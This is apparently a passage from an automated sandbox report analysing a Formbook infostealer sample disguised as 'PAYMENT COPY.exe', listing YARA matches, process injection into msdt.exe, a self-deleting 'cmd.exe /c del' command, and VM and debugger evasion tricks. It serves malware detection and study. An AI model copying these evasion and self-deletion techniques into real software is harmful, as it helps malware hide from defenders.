          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB6E15_2_00AEB6E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AD2FB05_2_00AD2FB0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 00ADB150 appears 35 times
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0041A0B0 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04CDB150 appears 45 times
          Source: PAYMENT COPY.exe, 00000001.00000003.334044214.000000001F25F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs PAYMENT COPY.exe
          Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PAYMENT COPY.exe.2650000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PAYMENT COPY.exe.2650000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@12/8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_004041E5
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004020A6 CoCreateInstance,MultiByteToWideChar,1_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsw3A72.tmpJump to behavior
          Source: PAYMENT COPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PAYMENT COPY.exeVirustotal: Detection: 32%
          Source: PAYMENT COPY.exeReversingLabs: Detection: 27%
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile read: C:\Users\user\Desktop\PAYMENT COPY.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess created: C:\Users\user\Desktop\PAYMENT COPY.exe 'C:\Users\user\Desktop\PAYMENT COPY.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'Jump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: msdt.pdbGCTL source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000001.00000003.335333892.000000001F140000.00000004.00000001.sdmp, PAYMENT COPY.exe, 00000002.00000002.379228424.0000000000BCF000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PAYMENT COPY.exe, msdt.exe
          Source: Binary string: msdt.pdb source: PAYMENT COPY.exe, 00000002.00000002.379579567.0000000002750000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.360125493.0000000007CA0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeUnpacked PE file: 2.2.PAYMENT COPY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,1_2_00401FDC
          Source: ek0j.dll.1.drStatic PE information: section name: .code
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041CA81 push es; ret 2_2_0041CA87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041C656 push ss; ret 2_2_0041C657
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00415EF0 push ss; iretd 2_2_00415F03
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_0041CFFA push BB2529E0h; iretd 2_2_0041D000
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B2D0D1 push ecx; ret 2_2_00B2D0E4
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041CA81 push es; ret 2_1_0041CA87
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B3C5 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B47C push eax; ret 2_1_0041B482
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B412 push eax; ret 2_1_0041B418
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_1_0041B41B push eax; ret 2_1_0041B482
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04D2D0D1 push ecx; ret 5_2_04D2D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AECA81 push es; ret 5_2_00AECA87
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB3C5 push eax; ret 5_2_00AEB418
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB41B push eax; ret 5_2_00AEB482
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB412 push eax; ret 5_2_00AEB418
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEB47C push eax; ret 5_2_00AEB482
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AE5EF0 push ss; iretd 5_2_00AE5F03
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AEC656 push ss; ret 5_2_00AEC657
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00AECFFA push BB2529E0h; iretd 5_2_00AED000
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3AA2.tmp\ek0j.dllJump to dropped file
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AD85F4 second address: 0000000000AD85FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000AD898E second address: 0000000000AD8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Windows\explorer.exe TID: 6204Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,1_2_00405301
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,1_2_00405C94
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_004026BC FindFirstFileA,1_2_004026BC
          Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.366638301.000000000D462000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.362236089.0000000008540000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.360549025.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.352285972.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.360457599.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.361717785.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000002.607543206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000004.00000002.594277957.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_004088C0 rdtsc 2_2_004088C0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00409B30 LdrLoadDll,2_2_00409B30
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_709B1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect,1_2_709B1000
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,1_2_00401FDC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_026417F0 mov eax, dword ptr fs:[00000030h]1_2_026417F0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_026415D8 mov eax, dword ptr fs:[00000030h]1_2_026415D8
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov ecx, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B0F0BF mov eax, dword ptr fs:[00000030h]2_2_00B0F0BF
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B020A0 mov eax, dword ptr fs:[00000030h]2_2_00B020A0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B190AF mov eax, dword ptr fs:[00000030h]2_2_00B190AF
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD9080 mov eax, dword ptr fs:[00000030h]2_2_00AD9080
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]2_2_00B53884
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B53884 mov eax, dword ptr fs:[00000030h]2_2_00B53884
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AD58EC mov eax, dword ptr fs:[00000030h]2_2_00AD58EC
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00B6B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B6B8D0
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
          Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 2_2_00AEB02A mov eax, dword ptr fs:[00000030h]2_2_00AEB02A
